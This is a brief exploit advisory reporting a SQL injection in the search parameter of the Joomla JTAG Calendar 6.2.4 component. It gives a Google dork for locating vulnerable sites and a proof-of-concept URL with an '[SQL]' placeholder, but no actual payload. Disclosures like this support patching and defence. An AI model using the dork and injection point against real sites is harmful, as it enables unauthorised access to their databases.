# Exploit Title: Joomla Component JTAG Calendar 6.2.4 - SQL Injection # Date: 2017-1-28 # Vender Home : https://extensions.joomla.org/extension/jtag-calendar/ # Exploit Author: Persian Hack Team # Discovered by : Mojtaba MobhaM # Home : http://persian-team.ir/ # Tested on: Windows AND Linux # Telegram Channel : @PersianHackTeam # Google Dork : inurl:index.php?option=com_jtagcalendar # POC : # Search Parameter Vulnerable to Sql Injection # http://Server.com/?option=com_jtagcalendar&format=raw&noframe=1&search=[SQL]&searchOnly=1 # Present to FireFighters # Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members